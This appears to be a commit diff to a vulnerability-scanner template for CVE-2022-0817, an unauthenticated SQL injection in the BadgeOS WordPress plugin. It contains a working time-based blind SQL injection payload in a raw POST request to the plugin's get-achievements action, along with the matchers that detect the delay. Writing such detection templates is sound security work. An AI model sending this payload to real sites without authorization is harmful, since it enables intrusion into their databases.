Update CVE-2022-0817.yaml
parent
aee13e5f1d
commit
c45172b1f0
|
@ -1,7 +1,7 @@
|
||||||
id: CVE-2022-0817
|
id: CVE-2022-0817
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: BadgeOS < 3.7.1 - Unauthenticated SQLi
|
name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection
|
||||||
author: theamanrawat
|
author: theamanrawat
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
|
@ -11,13 +11,10 @@ info:
|
||||||
- https://wordpress.org/plugins/badgeos/
|
- https://wordpress.org/plugins/badgeos/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0817
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0817
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
||||||
cvss-score: 9.8
|
|
||||||
cve-id: CVE-2022-0817
|
cve-id: CVE-2022-0817
|
||||||
cwe-id: CWE-89
|
|
||||||
metadata:
|
metadata:
|
||||||
verified: "true"
|
verified: true
|
||||||
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,badgeos,unauth
|
tags: cve,cve2022,wordpress,wp-plugin,wp,badgeos,unauth,sqli
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -27,13 +24,13 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
action=get-achievements&total_only=true&user_id=11+AND+(SELECT+9628+FROM+(SELECT(SLEEP(5)))WOrh)--+KUsb
|
action=get-achievements&total_only=true&user_id=11+AND+(SELECT+9628+FROM+(SELECT(SLEEP(6)))WOrh)--+KUsb
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'duration>=5'
|
- 'duration>=6'
|
||||||
- 'status_code == 200'
|
- 'status_code == 200'
|
||||||
- 'contains(content_type, "application/json")'
|
- 'contains(content_type, "application/json")'
|
||||||
- 'contains(body, "11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb")'
|
- 'contains(body, "badgeos-arrange-buttons")'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
Loading…
Reference in New Issue